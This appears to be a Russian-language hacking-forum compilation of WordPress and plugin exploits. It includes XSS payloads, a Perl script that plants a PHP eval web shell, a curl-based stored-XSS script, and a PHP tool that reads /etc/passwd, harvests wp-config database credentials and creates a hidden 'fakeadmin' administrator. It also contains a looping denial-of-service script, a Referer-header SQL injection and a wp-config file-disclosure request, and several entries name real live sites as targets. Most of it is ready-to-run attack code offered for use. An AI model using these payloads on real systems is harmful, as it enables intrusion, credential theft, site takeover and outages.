WordPress Plugin Advanced Twitter Widget 1.0.2 XSS Vuln http://wordpress.org/extend/plugins/advanced-twitter-widget/ \advanced-twitter-widget.php (c)eLwaux 30.06.2009, uasc.org.ua PHP: 89: if($_POST['advanced_twitter_widget_value']!=""){ 90: $xArrOptions[0]= $_POST['advanced_twitter_widget_title']; 91: $xArrOptions[1]= $_POST['advanced_twitter_widget_value']; 92: $xArrOptions[2]= $_POST['advanced_twitter_widget_type']; 93: $xArrOptions[3]= $_POST['advanced_twitter_widget_count']; 94: update_option('advanced_twitter_widget_options', serialize($xArrOptions)); 95: } 97: $xArrOptions = unserialize(get_option('advanced_twitter_widget_options')); 101: $xTitle = $xArrOptions[0]; 102: $xValue = $xArrOptions[1]; 103: $xType = $xArrOptions[2]; 104: $xCount = $xArrOptions[3]; 111: Title:<br/><input type="text" name="advanced_twitter_widget_title" value="<?php echo $xTitle;?>" /><br/><br/> 112: Account/Search:<br/><input type="text" name="advanced_twitter_widget_value" value="<?php echo $xValue;?>" /><br/><br/> exploit: Code: POST: advanced_twitter_widget_value=">{XSS1}<a " POST: advanced_twitter_widget_title=">{XSS2}<a " POST: advanced_twitter_widget_type=. POST: advanced_twitter_widget_count=.
WordPress Plugin ImHuman 0.0.9 XSS Vuln http://wordpress.org/extend/plugins/imhuman-a-humanized-captcha/ \imhuman.php (c)eLwaux 30.06.2009, uasc.org.ua PHP: 151: if(isset( $_POST['do'] )) { 152: if ( function_exists('current_user_can') && !current_user_can('manage_options') ) 153: die(__('Cheatin’ uh?')); 154: check_admin_referer($plugin_page); 155: 156: $t['imhuman_api_user'] = $_POST['imhuman_api_user']; 157: $t['imhuman_api_key'] = $_POST['imhuman_api_key']; 158: $t['imhuman_row'] = $_POST['imhuman_row']; 159: $t['imhuman_col'] = $_POST['imhuman_col']; 160: $t['imhuman_sel'] = $_POST['imhuman_sel']; 161: $t['imhuman_exc'] = isset($_POST['imhuman_exc'] ) ? 1 : 0; 162: $t['imhuman_word'] = $_POST['imhuman_word']; 163: $t['imhuman_lang'] = $_POST['imhuman_lang']; 164: update_option( 'imhuman_options', $t ); 165: $m = '<p>Settings Saved!</p>'; 166: } 167: $options = get_option( 'imhuman_options' ); .... 194: <td><input type="text" name="imhuman_api_user" id="imhuman_api_user" value="<?php echo $options['imhuman_api_user']; ?>" /></td> 195: </tr> 196: <tr> 197: <th><?php _e('ImHuman Ap? Key'); ?></th> 198: <td><input type="text" name="imhuman_api_key" id="imhuman_api_key" value="<?php echo $options['imhuman_api_key']; ?>" /></td> exploit: Code: POST: do=. POST: imhuman_api_user=">{XSS1}<a " POST: imhuman_api_key=">{XSS1}<a " POST: imhuman_row=. POST: imhuman_col=. POST: imhuman_sel=. POST: imhuman_word=. POST: imhuman_lang=.
WordPress Plugin Wordpress Toolbar 2.1.1 pXSS & PDisclosure Code: WordPress Plugin Wordpress Toolbar 2.1.1 pXSS & PDisclosure http://wordpress.org/extend/plugins/wordpress-toolbar/ http://abhinavsingh.com/blog/2009/02/wordpress-toolbar-plugin/ Dork: "inurl:wp-toolbar.php" ## ## ## ## eLwaux(c)2009 UASC.org.ua ## ## ## ## Path Disclosure /wp-content/plugins/wordpress-toolbar/wp-toolbar.php ( call to undefined function add_action() ) ----------------------------------------------------------------- 1: <?php 12: include_once("socialsites.php"); 14: add_action('admin_menu','wordpress_toolbar_admin'); ----------------------------------------------------------------- example: http://www.watblog.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php http://www.maktabe.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php http://helenoticias.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php http://seattlesocialmedia.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php ## ## ## ## XSS /wp-content/plugins/wordpress-toolbar/toolbar.php ----------------------------------------------------------------- 30: $tourl = $_GET['wp-toolbar-tourl']; 42: $blogtitle = $_GET['wp-toolbar-blogtitle']; 52: <title><?php echo $blogtitle; ?> - Toolbar</title> 56: <iframe frameborder="0" noresize="noresize" src="<?php echo $tourl; ?>" ----------------------------------------------------------------- PoC: wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title>{XSS} wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl=">{XSS}<div id=" example: http://www.alymelfashionfusion.com/Blog/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script> http://www.pclinuxos.hu/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script> http://www.watblog.com/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl="><script>alert(/xss2/);</script><div%20id="
Wordpress plugin Add UROK.su Catalog < 1.03 Code Execution Exploit надо логин:пароль админа Code: Wordpress plugin Add UROK.su Catalog < 1.03 Code Execution Exploit ------------ http://wordpress.org/extend/plugins/add-uroksu-catalog/ Add UROK.su Catalog Version: 1.03 ------------ \wp-content\plugins\add-uroksu-catalog\urok.su.class.php ---------------------------------------------------------------------- |56| if (isset($_POST['UPDATE'])) { |57| MyUROKsu_user=$_REQUEST['login']; |58| $file_name=$file_name=dirname(__FILE__).'/login.txt'; |59| $w=fopen($file_name,'w'); |60| fwrite($w,$MyUROKsu_user); |61| fclose($w); |62| print($this->update_catalog($MyUROKsu_user)); |63| echo '</p>'; |64| } ---------------------------------------------------------------------- Steps to code execution: 1) /wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php POST: UPDATE=.& login=<?php=@eval($_GET['c']);?> (your code will be saved to file: /wp-content/plugins/add-uroksu-catalog/login.txt) 2) include this file & code execute: /wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=system('id'); perl exploit: ---------------------------------------------------------------------- PHP: #! /usr/bin/perl -w use LWP::UserAgent; use warnings; print "\n WP ] add-uroksu-catalog < 1.03 [ exploit\n"; print " eLwaux(c)uasc 2009\n\n"; if (!$ARGV[2]) { print " usage:\n". " expl.pl http://site.com/wp/index.php adminLogin adminPass\n". exit(0); } my $mHost = $ARGV[0]; my $mAdmL = $ARGV[1]; my $mAdmP = $ARGV[2]; #$mAdmL =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg; #$mAdmP =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg; my $HOST = $1 if ($mHost =~ /http:\/\/(.+?)\//); my $UA = LWP::UserAgent->new; $UA->timeout(20); $UA->default_header('Referer' => $mHost.'wp-login.php'); $UA->default_header('Cookie' => 'wordpress_test_cookie=WP+Cookie+check;'); # login to WP my $page = $UA->post($mHost.'wp-login.php', { log => $mAdmL, pwd => $mAdmP, # rememberme => 'forever', submit => 'Войти', redirect_to => $mHost.'wp-admin/', testcookie => 1 } )->as_string; my $cookie = ''; my @SetCookie = ($page =~ m/Set-Cookie: (.+?=.+?);/g); foreach my $SC (@SetCookie) { $cookie .= $SC.';'; } if (length($cookie)<100) { print ' - bad login:password!'; exit(0); } print ' - good login:password!'."\n"; $UA->default_header('Cookie' => $cookie); print ' .. sending exploit..'."\n"; # send EXPLOIT $page = $UA->post($mHost.'wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php', { login => '<?php @eval($_GET[\'c\']);?>', UPDATE => 1 } )->as_string; print ' + exploit send!'."\n"; # try execute simple code $page = $UA->get($mHost.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=print_r($_SERVER);')->as_string; if ($page =~ /\[SERVER_SOFTWARE\] => (.+?)[\r\n]+/) { print ' + result of test1: '.$1."\n"; print ' + result of test2: '.$1."\n" if ($page =~ /\[SCRIPT_FILENAME\] => (.+?)[\r\n]+/); } else { print ' - perhaps code is not injected!'."\n"; } print ' ! FINISH!'."\n\n"; print ' !! your shell:'."\n"; print ' '.$mHost."\n". ' '.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE}'."\n"; exit(0); Code: ---------------------------------------------------------------------- simple result on localhost: ---------------------------------------------------------------------- > expl.pl http://localhost/cms/wordpress/ admin "4#@!v^w!*)kW" WP ] add-uroksu-catalog < 1.03 [ exploit eLwaux(c)uasc 2009 - good login:password! .. sending exploit.. + exploit send! + result of test1: Apache/2.2.11 (Win32) PHP/5.2.9-2 + result of test2: C:/wamp/www/cms/wordpress/wp-admin/admin.php ! FINISH! !! your shell: http://localhost/cms/wordpress/ wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE} ----------------------------------------------------------------------
XSS [Все версии] Сегодня было опубликована ксс, работает вплоть до текущей версии включительно. Code: http://www.site.com’onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57); Для устранения в файле wp-comments-post.php ~40 строку изменяем: Code: $comment_author_url = str_replace(chr(39),”,$comment_author_url); $comment_author_url = str_replace(chr(59),”,$comment_author_url); $comment_author_url = str_replace(chr(44),”,$comment_author_url);
Wordpress 2.8.1 (url) Remote Cross Site Scripting Exploit This can be used to hack 2.8.1 through Remote XSS. Code: echo "wp281.quickprz // iso^kpsbr" SITE=$1 COMMENT=$2 MESSAGE="h4x0riZed by the superfreakaz0rz" if [ "X$SITE" = "X" ]; then echo "$0 <url> [postID]" echo "f.e. $0 www.worstpress.eu" exit fi if [ "X$POSTID" = "X" ]; then POSTID=1 fi echo "[+] building payload" WHERE="title" # can also be 'content' PATH="$SITE/wp-comments-post.php" WHERE=`echo -n "$WHERE" | /usr/bin/od -t d1 -A n | /bin/sed 's/\\s\\s*/,/g' | /bin/sed 's/^,//'` EVILURL="http://w.ch'onmouseover='document.getElementById(String.fromCharCode($WHERE)).value=this.innerHTML;document.getElementById(String.fromCharCode(112,117,98,108,105,115,104)).click();" echo "[-] payload is $EVILURL for '$MESSAGE'" EVILURL=`echo -n "$EVILURL" | /usr/bin/od -t x1 -A n | /usr/bin/tr " " %` MESSAGE=`echo -n "$MESSAGE" | /usr/bin/od -t x1 -A n | /usr/bin/tr " " %` RNDDATA=`/bin/date +%S%s`; echo "[!] delivering data" /usr/bin/curl -A "Quickprz" -d "author=$MESSAGE&[email protected]&url=$EVILURL&comment=hi+there%5F+this+is+just+some+very+harmless+spam+$RNDDATA&submit=Submit+Comment&comment_post_ID=$POSTID" $PATH echo "[X] all done. now wait for admin to mouse-over that name." # milw0rm.com [2009-07-24]
WP-Config Discover Code: 1. < ?php 2. $paths = array( 3. "blog", 4. "site", 5. "html", 6. "www", 7. "html/blog", 8. "www/blog", 9. "site/blog", 10. "wordpress", 11. "wp", 12. "www/wp", 13. "www/wordpress", 14. "html/wordpress", 15. "html/wp", 16. "public_html", 17. "public_html/blog", 18. "public_html/wp", 19. "public_html/wordpress", 20. ); 21. $files = array( 22. "wp-config.php", 23. ); 24. print "Checking for ….\n"; 25. if(!is_readable("/etc/passwd")) die("err0r: can’t read /etc/passwd (safe mode?)"); 26. $_f = @file("/etc/passwd"); 27. foreach($_f as $usr){ 28. $usr = explode(":", $usr); 29. $uid = $usr[2]; 30. $home = $usr[5]; 31. $usr = $usr[0]; 32. if($uid >= 1000){ 33. print $usr." (uid:".$uid."): ".$home."\n"; 34. foreach($paths as $path){ 35. if(file_exists($home."/".$path)) { 36. print "\tSearching in ".$home."/".$path."\n"; 37. foreach($files as $file){ 38. if(file_exists($home."/".$path."/".$file)){ 39. print "\t\tFound: ".$file."\n"; 40. $__f = @file($home."/".$path."/".$file); 41. foreach($__f as $line){ 42. if(stristr($line, "DB_USER")) { preg_match_all(‘/define\(\’(.*)\);/’, $line, $output); print "\t\t\t".str_replace("DB_USER’, ","usr=>", $output[1][0])."\n"; } 43. if(stristr($line, "DB_PASSWORD")) { preg_match_all(‘/define\(\’(.*)\);/’, $line, $output2); print "\t\t\t".str_replace("DB_PASSWORD’, ", "pwd=>", $output2[1][0])."\n"; } 44. if(stristr($line, "DB_NAME")) { preg_match_all(‘/define\(\’(.*)\);/’, $line, $output3); print "\t\t\t".str_replace("DB_NAME’, ", "db=>", $output3[1][0])."\n"; } 45. if(stristr($line, "DB_HOST")) { preg_match_all(‘/define\(\’(.*)\);/’, $line, $output4); print "\t\t\t".str_replace("DB_HOST’, ", "host=>", $output4[1][0])."\n"; } 46. if(stristr($line, "\$table_prefix")) { preg_match_all(‘/\$table_prefix(.*);/’, $line, $output5); print "\t\t\tprefix".$output5[1][0]."\n"; } 47. flush(); 48. } 49. print "\t\t\tURL: ".getURL($output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n"; 50. if($_GET[‘attack’] == "create_user") print "\t\t\tUser/pass created: ".UserAdmin("create", $output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n"; 51. if($_GET[‘attack’] == "delete_user") print "\t\t\tfakeadmin deleted: ".UserAdmin("delete", $output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n"; 52. flush(); 53. } 54. } 55. } 56. flush(); 57. } 58. flush(); 59. } 60. } 61. function getURL($user, $pass, $db, $host, $prefix){ 62. preg_match_all(‘/, \’(.*)\’/’, $user, $user); $user = $user[1][0]; 63. preg_match_all(‘/, \’(.*)\’/’, $pass, $pass); $pass = $pass[1][0]; 64. preg_match_all(‘/, \’(.*)\’/’, $db, $db); $db = $db[1][0]; 65. preg_match_all(‘/, \’(.*)\’/’, $host, $host); $host = $host[1][0]; 66. preg_match_all(‘/\’(.*)\’/’, $prefix, $prefix); $prefix = $prefix[1][0]; 67. $sql = @mysql_connect($host, $user, $pass); 68. @mysql_select_db($db); 69. $_q = @mysql_query("SELECT option_value FROM ".$prefix."options WHERE option_name=’siteurl’", $sql); 70. @mysql_close($sql); 71. return @mysql_result($_q, 0, ‘option_value’); 72. } 73. 74. function UserAdmin($action, $user, $pass, $db, $host, $prefix){ 75. preg_match_all(‘/, \’(.*)\’/’, $user, $user); $user = $user[1][0]; 76. preg_match_all(‘/, \’(.*)\’/’, $pass, $pass); $pass = $pass[1][0]; 77. preg_match_all(‘/, \’(.*)\’/’, $db, $db); $db = $db[1][0]; 78. preg_match_all(‘/, \’(.*)\’/’, $host, $host); $host = $host[1][0]; 79. preg_match_all(‘/\’(.*)\’/’, $prefix, $prefix); $prefix = $prefix[1][0]; 80. $sql = @mysql_connect($host, $user, $pass); 81. @mysql_select_db($db); 82. if($action == "create"){ 83. $wp_uid = rand(9990,99999); 84. @mysql_query("INSERT INTO ".$prefix."users(id, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES(".$wp_uid.", ‘fakeadmin’, md5(’dummie’), ‘wordpress’, ‘[email protected]’, ‘http://’, NOW(), ”, 0, ‘wordpressdummieadmin’)", $sql); 85. @mysql_query("INSERT INTO ".$prefix."usermeta (user_id, meta_key, meta_value) VALUES (".$wp_uid.", ‘wp_capabilities’, ‘a:1:{s:13:\"administrator\";b:1;}’ )", $sql); 86. } 87. if($action == "delete"){ 88. mysql_query("DELETE FROM ".$prefix."usermeta WHERE user_id=(SELECT id FROM ".$prefix."users WHERE user_login=’fakeadmin’)", $sql); 89. mysql_query("DELETE FROM ".$prefix."users WHERE user_login=’fakeadmin’", $sql); 90. } 91. @mysql_close($sql); 92. return "fakeadmin/dummie"; 93. } 94. ?>
Серьезная быра была обнаружена в файле WP-trackbacks.php. Уязвимость состоит в том, что любой посетитель буквально 20 запросами может положить сайт. Открываем файл WP-trackbacks.php: Code: if ( function_exists(’mb_convert_encoding’) ) { // For international trackbacks $title = mb_convert_encoding($title, get_option(’blog_charset’), $charset); $excerpt = mb_convert_encoding($excerpt, get_option(’blog_charset’), $charset); $blog_name = mb_convert_encoding($blog_name, get_option(’blog_charset’), $charset); } $charset передается через $_POST['charset']. И вя проблема состоит в кодировке mb_convert_encoding Code: $text = mb_convert_encoding($text,’UTF-8′,’UTF-7,ISO-8859-1′); Эта функция преобразует $text в UTF-8. Но если мы сделаем так: Code: $text = mb_convert_encoding($text,’UTF-8′,’ISO-8859-1,ISO-8859-1,ISO-8859-1,ISO-8859-1′); mb_convert_encoding попытает определить кодировку $text, и будет проверять является ли она ISO-8859-1, и так снова и снова. Эскплоит уже придумали до меня: Code: <?php //wordpress Resource exhaustion Exploit // by rooibo //[email protected] contacted and get a response, //but no solution available. if(count($argv) < 2) { echo “You need to specify a url to attack\n”; exit; } $url = $argv[1]; $data = parse_url($url); if(count($data) < 2) { echo “The url should have http:// in front of it, and should be complete.\n”; exit; } if(count($data) == 2) { $path = ”; } else { $path = $data['path']; } $path = trim($path,’/'); $path .= ‘/wp-trackback.php’; if($path{0} != ‘/’) { $path = ‘/’.$path; } $b = “”; $b = str_pad($b,140000,’ABCEDFG’); $b = utf8_encode($b); $charset = “”; $charset = str_pad($charset,140000,”UTF-8,”); $str = ‘charset=’.urlencode($charset); $str .= ‘&url=www.example.com’; $str .= ‘&title=’.$b; $str .= ‘&blog_name=lol’; $str .= ‘&excerpt=lol’; $count = 0; while(1) { $fp = @fsockopen($data['host'],80); if(!$fp) { if($count > 0) { echo “down!!!!\n”; exit; } echo “unable to connect to: “.$data['host'].”\n”; exit; } fputs($fp, “POST $path HTTP/1.1\r\n”); fputs($fp, “Host: “.$data['host'].”\r\n”); fputs($fp, “Content-type: application/x-www-form-urlencoded\r\n”); fputs($fp, “Content-length: “.strlen($str).”\r\n”); fputs($fp, “Connection: close\r\n\r\n”); fputs($fp, $str.”\r\n\r\n”); echo “hit!\n”; $count++; } ?> Запускаем так: php exploit.php http://site.com Для патчинга открываем файл WP-trackbacks.php, ищем строку: Code: $charset = $_POST['charset']; Заменяем на: Code: $charset = str_replace(”,”,”",$_POST['charset']); if(is_array($charset)) { exit; }
WordPress Google Analytics Plugin 3.x WordPress Google Analytics Plugin 3.x Code: http://localhost/wp/?s=</script><script>alert(0)</script> http://localhost/wp/?s=");alert(0);document.write("
Раскрытие пути плагина cforms да по сути что не зайди там на файл, то раскрытие файл: cforms-captcha.php PHP: $im_bg_url= 'captchabg/' . ( prep($_REQUEST['b'],'1.gif') ); /////ну и косячная функция getimagesize $image_data=getimagesize($im_bg_url); пример : http://www.sakeservices.com/wp-content/plugins/cforms/cforms-captcha.php?b=1'
плагин xcloner phpinfo() файл /restore/XCloner.php PHP: switch ($_REQUEST[task]) { case 'step2': step2(); break; case 'step1': step1(); break; case 'getinfo': getPHPINFO(); break; case 'info': echo phpinfo(); break; default : start(); break; } __http://www.hellboysword.com/wp-content/plugins/xcloner/restore/XCloner.php?task=info
плагин nsx-referers плагин nsx-referers /wp-content/plugins/nsx-referers/nsx-referers-stat.php PHP: ....... $referer = $_SERVER['HTTP_REFERER']; $ref_arr = parse_url("$referer"); ....... $res_query = urldecode($ref_arr['query']); if (preg_match("/{$hosts[$host]}(.*?)&/si",$res_query."&",$matches)) { $search = $matches[1]; } if ($wpdb->rows_affected < 1) $wpdb->query( "INSERT INTO ".REFTABLE." VALUES ('', '$url', 'NULL', 'NULL', '$search', 1)"); в Referer отсылаем http://yandex.ru/yandsearch?text=wp%27,1),(0x00,0x2f,0x00,0x00,user(),1)%23&lr=6
WordPress - Amcaptcha plugin ( amcaptcha.php ) <= 1.5 CSRF Ошибка в коде в функции: PHP: function comment_post ($id){ global $user_ID; global $langs; $texts = $langs[get_option('ac_lang')]; if ($user_ID) return $id; if ($_POST[$_SESSION['amcaptcha_session']] != '1'){ wp_delete_comment($id); echo "<strong>".$texts['error']."</strong><br/><br/>".$_POST['comment']; exit; } } а точнее: PHP: if ($_POST[$_SESSION['amcaptcha_session']] != '1'){ wp_delete_comment($id); echo "<strong>".$texts['error']."</strong><br/><br/>".$_POST['comment']; exit; } если чел не передал сессию этого модуля ( а точнее не отметил чекбокс -- "Подтверждаю, что я не спам-бот" ) то модуль выдает ошибку и при этом не фильтрует $_POST['comment']. Сам сплойт выглядит так : Code: <html> <head> <title>WordPress - Amcaptcha plugin ( amcaptcha.php ) <= 1.5 CSRF Exploit</title> <!-- Vulnerability found by total90, exploit written by Dr.TRO --> </head> <body> <form action="http://[Домен][Путь к WP]wp-comments-post.php" method="post" name="commentform"> <input type="hidden" name="author" value="Dr.TRO" /> <input type="hidden" name="email" value="[email protected]" /> <input type="hidden" name="comment" value="[Уязвимое место]" /> <input type="hidden" name="comment_post_ID" value="[ID существующего поста]" /> <input type="submit" name="submit" value="Request" /> </form> </body> </html> Анализ кода и сплойт by Dr.TRO Google dork: Для того, чтобы иметь возможность комментировать, включите JavaScript в Вашем браузере.
WordPress Plugin [jRSS Widget] File Disclosure Vulnerability Plugin name: jRSS Widget (download) Version: 1.0 File Disclosure Vuln file: /wp-content/plugins/jrss-widget/proxy.php PHP: header('Content-type: application/xml'); $handle = fopen($_REQUEST['url'], "r"); if ( $handle ) { while ( !feof($handle) ) { $buffer = fgets($handle, 4096); echo $buffer; } fclose($handle); } Exploit: Code: POST http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/wp-content/plugins/jrss-widget/proxy.php HTTP/1.0 Content-type: application/x-www-form-urlencoded url=[COLOR=White]../../../wp-config.php[/COLOR]
Wordpress 2.9.2 Passive XSS Search.php Сразу оговорюсь, данная уязвимость присутствует не во всех wp-темах. Рассмотрим тему Simple Balance search.php: PHP: <?php include (TEMPLATEPATH . '/header.php'); ?> <div id="page"> <?php if (!isset($theme_options["layout_style"]) || $theme_options["layout_style"] == "scs") { include (TEMPLATEPATH . '/lsidebar.php'); } ?> <div id="content"> <?php include (TEMPLATEPATH . '/topads.php'); ?> <h4 class="archiveTitle">Результаты поиска <strong>'<?php echo $s?>'</strong></h4> <?php if (have_posts()) : ?> <?php while (have_posts()) : the_post(); ?> <div class="post"> <div class="postTitle"><h2><a href="<?php the_permalink() ?>" rel="bookmark" title="<?php the_title(); ?>"><?php the_title(); ?></a></h2></div> <div class="postInfo">Опубликовано <?php the_time('d.m.Y'); ?> в рубрике <?php the_category(', ') ?> <?php edit_post_link('изменить', '(', ')'); ?></div> <div class="postContent"> <?php the_excerpt(); ?> </div> <?php if(function_exists('the_tags')) { ?><div class="postExtras"><strong>Метки:</strong> <?php the_tags('', ', ', ''); ?></div><?php } ?> <div class="postMeta"> <span class="postLink"><a href="<?php the_permalink() ?>" title="<?php the_title(); ?>">Читать пост</a></span> <?php $comNo = get_comment_type_count('comment'); // Checking if there are any actual comments (trackbacks and pingbacks excluded) if ($comNo == 1 ) { ?> <span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Один комментарий', 'Комментариев '.$comNo.''); ?></span> <?php } elseif ($comNo > 1) { ?> <span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Один комментарий', 'Комментариев '.$comNo.''); ?></span> <?php } else { ?> <span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Прокомментируете?', 'Прокомментируете?'); ?></span> <?php } ?> </div> </div> <?php endwhile; ?> <div class="navigation"> <div class="left"><?php previous_posts_link('« В будущее') ?></div> <div class="right"><?php next_posts_link('В прошлое »') ?></div> </div> <?php else: ?> Ничего не найдено.<br /> Извините, по вашему запросу ничего не найдено. Возможно, вам стоит изменить параметры поиска? <?php endif; ?> </div> <?php if (isset($theme_options["layout_style"]) && $theme_options["layout_style"] == "css") { include (TEMPLATEPATH . '/lsidebar.php'); } ?> <?php include (TEMPLATEPATH . '/rsidebar.php'); ?> </div> <?php include (TEMPLATEPATH . '/footer.php'); ?> нас интересует только: PHP: <h4 class="archiveTitle">Результаты поиска <strong>'<?php echo $s?>'</strong></h4> Как видим, скрипт выводит параметр $s, никак не фильтруя его. Соответственно если передать скрипту js код в теге <script>, он выполнится. Эксплуатация:[host]/[path]/?s=[xss] Пример: http://seocekret.ru/?s=<script>alert()</script>